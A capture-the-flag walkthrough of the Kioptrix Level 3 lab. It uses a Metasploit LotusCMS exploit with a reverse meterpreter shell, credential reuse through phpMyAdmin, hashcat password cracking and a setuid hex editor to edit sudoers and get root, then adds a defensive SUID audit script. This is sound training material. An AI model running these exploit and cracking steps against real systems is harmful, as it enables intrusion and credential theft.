vulhub-Kioptrix Level 3


  • netdiscover
  • Nmap
  • Nikto
  • Metasploit
  • Wfuzz
  • Hashcat

Use netdiscover to detect the target's IP address:

netdiscover -i eth0 -r is the target.

Then run nmap to detect open ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Ports 22 and 80 are open.

Now use Nikto to scan:

nikto -h

Nothing exciting.

Now let's browse the web page on the target.

The target may be using LotusCMS.

In msfconsole:

search LotusCMS

This finds one exploit:

msf > use exploit/multi/http/lcms_php_exec 
msf exploit(lcms_php_exec) > set rhost
msf exploit(lcms_php_exec) > set uri 
msf exploit(lcms_php_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(lcms_php_exec) > set lhost

Got the shell. The next step is to try to get root.

In this step, I tried to enumerate all kinds of shit and used several vulnerable kernel exploits to get root, but failed. During the enumeration, I found an interesting file, gconfig.php. Then I found that:

Maybe the username/password for SSH, but no. That's too easy.

So I went back and used wfuzz to scan the HTTP service.

Looks like it has phpMyAdmin. Try that:

Log in using the username/password that was just found. Success.

Review the content and find this:

Now we have two users and their hashed passwords:

Copy the password hashes to a file and use hashcat to crack them:

hashcat hash.txt /usr/share/wordlists/rockyou.txt

Both passwords are recovered:

SSH to the target and search for SUID binaries:

find / -perm +6000 -type f -exec ls -ld {} \;

Found an interesting file, /usr/local/bin/ht. I googled it and found it is a hex editor.

Now try to use it to open the /etc/sudoers file. It gives an error message. To fix it:

export TERM=xterm

Change loneferret's permissions:

Get root.
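
The same SUID search is how a defender would catch this before it is abused: an editor installed setuid root, such as /usr/local/bin/ht, can rewrite any file on the system. As an added example (not part of the original walkthrough), the script below reads `ls -ld` lines in the format printed by the find command above and reports setuid/setgid files that are missing from a reviewed allowlist. The allowlist contents, the function names and the sample listing are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original write-up). Reads `ls -ld` lines and
# reports setuid/setgid files that are not on a reviewed allowlist.

# Assumption: a short illustrative baseline; build the real one per host.
DEFAULT_ALLOW='/bin/su
/bin/mount
/bin/umount
/bin/ping
/usr/bin/passwd
/usr/bin/sudo'

# audit_suid [allowlist_file]: stdin is ls -ld output, stdout is KIND<TAB>PATH
audit_suid() {
    if [ -n "${1:-}" ] && [ -r "$1" ]; then
        ALLOW=$(cat "$1")          # one absolute path per line
    else
        ALLOW=$DEFAULT_ALLOW
    fi
    ALLOW="$ALLOW" awk '
        BEGIN { n = split(ENVIRON["ALLOW"], a, "\n")
                for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        {
            mode = $1; owner = $3
            p = index($0, " /")    # absolute path starts here, any date style
            if (p == 0) next
            path = substr($0, p + 1)
            suid = (substr(mode, 4, 1) ~ /[sS]/)   # owner execute slot
            sgid = (substr(mode, 7, 1) ~ /[sS]/)   # group execute slot
            if (!(suid || sgid) || (path in ok)) next
            kind = suid ? (owner == "root" ? "SUID-ROOT" : "SUID") : "SGID"
            printf "%s\t%s\n", kind, path
        }'
}

# Constructed sample listing (sizes, dates and modes are made up).
sample_listing() {
    cat <<'EOF'
-rwsr-xr-x 1 root root 25540 2008-03-27 14:03 /bin/su
-rwsr-xr-x 1 root root 29104 2008-04-02 21:08 /usr/bin/passwd
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
-rwxr-sr-x 1 root tty 8192 Apr  2  2008 /usr/bin/wall
-rwxr-xr-x 1 root root 92376 2008-04-04 02:42 /bin/ls
EOF
}

sample_listing | audit_suid
```

On a live host, pipe the find output into `audit_suid` instead of the sample listing. Current GNU find no longer accepts `-perm +6000`; use `-perm /6000` there.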